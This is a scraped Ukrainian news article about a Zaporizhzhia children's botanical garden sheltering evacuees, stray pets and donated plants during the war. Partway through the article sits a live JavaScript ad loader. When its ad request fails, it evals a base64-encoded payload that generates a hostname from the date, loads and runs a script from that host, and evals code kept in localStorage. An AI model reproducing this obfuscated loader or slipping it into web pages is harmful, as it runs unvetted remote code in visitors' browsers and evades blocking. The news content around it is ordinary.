Запорізький ботанічний сад перетворився на прихисток для людей, тварин та рослин (ВІДЕО)

У Запорізькому міському дитячому ботанічному саду організували тимчасовий прихисток для людей, тварин та рослин.

Про це повідомляють кореспонденти Суспільного, які побували в ботсаду.

В адміністративній будівлі ботанічного саду поставили ліжка. Вони призначені для евакуйованих та тих, хто транзитом їде через Запоріжжя. Тут можна зупинитися разом із домашніми улюбленцями. Тварин також можуть взяти на тимчасову перетримку.

У Запорізькому ботанічному саду зробили прихисток для людей, тварин та рослин
Тамара Єрьоміна

“Дуже багато зараз стало тих тваринок: кішечки, собачки, які бігають голодні, видно, що вони були домашні, але зараз вони без притулку. Мабуть же, кудись виїхали ці люди, а собачки залишилися, і вони не можуть тепер самі собі знайти їжу”, — розповідає директорка дитячого ботанічного саду Тамара Єрьоміна.

У Запорізькому ботанічному саду зробили прихисток для людей, тварин та рослин

Співробітники ботанічного саду та тварини, яких тут прихистили

Люди, які виїжджають також здають сюди рослини. Їх спочатку відправляють на карантин, а потім доєднують до решти колекції. Біля кожної рослини пишуть, ким вона подарована і збирають їх в окремий куточок.

У Запорізькому ботанічному саду зробили прихисток для людей, тварин та рослин

У ботсаду працює кухня. Тут готують щодня, за потреби навіть вночі. Якщо багато людей — розставляють столи у дворі. Під час нічних тривог до сховища у ботсаду приходять ховатися і мешканці будинків, що розташовані поруч із закладом. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Так сталося, що люди стали казати: чи можна ми у вас залишимося до ранку? Вже і сирени не було, а все одно. І ми стали потрішки з класів робити готель”, — каже Тамара Єрьоміна.

У Запорізькому ботанічному саду зробили прихисток для людей, тварин та рослин

Сховище в ботанічному саду

Нині в ботанічному саду працюють 120 людей. Серед них — бухгалтерка Ірина Гречана. Жінка виїхала напередодні війни, 23 лютого, до близьких в Запоріжжя. Вона влаштувалася на роботу за спеціальністю і повертатися додому наразі не планує.

У Запорізькому ботанічному саду зробили прихисток для людей, тварин та рослин
Ірина Гречана

“Вирішила працевлаштуватися, тому що повертатися було вже нікуди. Знаю, що там є дім стоїть, але ж є значні пошкодження”, — розповідає Ірина.

За словами Тамари Єрьоміною, деякі співробітники ботсаду тимчасово поселилися на робочому місці. Окрім своїх обов’язків, волонтерять, зокрема, із власних коштів збирають гроші для українських військових.

Фото, відео: Суспільне Запоріжжя (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/zaporizkij-botanichnij-sadu-peretvorivsya-na-prihistok-dlya-lyudej-tvarin-ta-roslin-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top